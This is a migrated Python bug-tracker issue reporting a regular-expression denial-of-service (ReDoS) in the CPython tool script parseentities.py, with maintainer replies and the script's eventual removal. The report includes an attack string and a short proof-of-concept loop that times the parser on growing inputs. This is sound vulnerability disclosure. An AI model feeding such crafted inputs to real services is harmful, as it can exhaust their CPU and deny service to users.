REDoS in parseentities #86087

yetingli · 2020-10-03T15:12:49Z

BPO	41921
Nosy	@malemburg, @serhiy-storchaka, @pablogsal, @yetingli

^{Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.}

Show more details

GitHub fields:

assignee = None
closed_at = None
created_at = <Date 2020-10-03.15:12:49.444>
labels = ['3.9', '3.10', '3.11']
title = 'REDoS in parseentities'
updated_at = <Date 2021-12-06.10:24:39.254>
user = 'https://github.com/yetingli'

bugs.python.org fields:

activity = <Date 2021-12-06.10:24:39.254>
actor = 'lemburg'
assignee = 'none'
closed = False
closed_date = None
closer = None
components = ['Demos and Tools']
creation = <Date 2020-10-03.15:12:49.444>
creator = 'yetingli'
dependencies = []
files = []
hgrepos = []
issue_num = 41921
keywords = []
message_count = 3.0
messages = ['377885', '378011', '407783']
nosy_count = 4.0
nosy_names = ['lemburg', 'serhiy.storchaka', 'pablogsal', 'yetingli']
pr_nums = []
priority = 'normal'
resolution = None
stage = None
status = 'open'
superseder = None
type = None
url = 'https://bugs.python.org/issue41921'
versions = ['Python 3.9', 'Python 3.10', 'Python 3.11']

yetingli · 2020-10-03T15:12:49Z

Hi,

I find this regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' may be stucked by input.
The vulnerable regex is located in

cpython/Tools/scripts/parseentities.py

Line 18 in 8d21aa2

    
           entityRE = re.compile('<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')

The ReDOS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

You can execute the following code to reproduce ReDos

from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")

Looking forward for your response!

Best,
Yeting Li

pablogsal · 2020-10-05T09:47:51Z

Without evaluating the validity of the regex vulnerability, is important to note that the files in Tools/scripts are not part of the standard library and therefore they aren't a valid stack vector.

malemburg · 2021-12-06T10:24:39Z

Interesting that the tool still exists. It uses mxTextTools, but in a non-packaged version, so it's been broken for two decades now :-)

I think it's safe to remove it from Tools\scripts.

ezio-melotti · 2022-06-22T06:54:38Z

Tools/scripts/parseentities.py has been removed in #92504.

yetingli mannequin added 3.7 (EOL) end of life 3.8 (EOL) end of life 3.10 only security fixes 3.9 only security fixes labels Oct 3, 2020

iritkatriel added 3.11 only security fixes and removed 3.7 (EOL) end of life 3.8 (EOL) end of life labels Dec 6, 2021

ezio-melotti transferred this issue from another repository Apr 10, 2022

ezio-melotti mentioned this issue Jun 19, 2022

gh-82927: Update files related to HTML entities. #92504

Merged

ezio-melotti added this to html.parser issues Jun 19, 2022

ezio-melotti closed this as completed Jun 22, 2022

ezio-melotti moved this to Done in html.parser issues Jun 22, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

REDoS in parseentities #86087

REDoS in parseentities #86087

yetingli mannequin commented Oct 3, 2020

yetingli mannequin commented Oct 3, 2020

pablogsal commented Oct 5, 2020

malemburg commented Dec 6, 2021

ezio-melotti commented Jun 22, 2022

REDoS in parseentities #86087

REDoS in parseentities #86087

Comments

yetingli mannequin commented Oct 3, 2020

yetingli mannequin commented Oct 3, 2020

pablogsal commented Oct 5, 2020

malemburg commented Dec 6, 2021

ezio-melotti commented Jun 22, 2022